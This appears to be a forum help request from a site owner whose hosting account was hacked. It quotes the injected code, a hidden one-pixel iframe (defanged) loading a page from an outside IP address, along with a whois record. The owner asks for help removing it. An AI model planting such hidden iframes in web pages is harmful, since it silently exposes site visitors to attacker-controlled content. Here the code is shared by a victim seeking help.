I have 30 domains hosted at godaddy, 5 operational sites, others are parked pages. A amsterdam HACKER has somehow entered my hosting account either via FTP or someother way and inserted some scripts to redirect traffic. I don't know how to get rid of this? Does anyone have a script that I can give my web design company to use to seek and remove such a hacker? Or what is teh best way to secure my account for teh future. What is the purpose of the hacker. Sorry for all this but I am not a admin/it person, can anyone help. The following is the code – except edited slightly because my security filters have stopped this email twice now. The code is original – with [defanged] inserted to pass filters. < iframe src='ht[DEFANGED]tp://81.95.149.74/22/in[DEFANGED]dex.php[DEFANGED]' width='1' height='1' style='visibility: hidden[DEFANGED];'></iframe> It is in all the website twice. Please note that this server is no longer “listening†on any common ports, including HTTP, unless they change IP addresses. Here’s the whois OrgName: RIPE Network Coordination Centre OrgID: RIPE Address: P.O. Box 10096 City: Amsterdam StateProv: PostalCode: 1001EB Country: NL ReferralServer: whois://whois.ripe.net:43 NetRange: 81.0.0.0 - 81.255.255.255 CIDR: 81.0.0.0/8 NetName: 81-RIPE NetHandle: NET-81-0-0-0-1 Parent: NetType: Allocated to RIPE NCC NameServer: NS-PRI.RIPE.NET NameServer: NS3.NIC.FR NameServer: SUNIC.SUNET.SE NameServer: NS-EXT.ISC.ORG NameServer: SEC1.APNIC.NET NaeServer: SEC3.APNIC.NET NameServer: TINNIE.ARIN.NET Comment: These addresses have been further assigned to users in Comment: the RIPE NCC region. Contact information can be found in Comment: the RIPE database at http://www.ripe.net/whois RegDate: Updated: 2005-07-27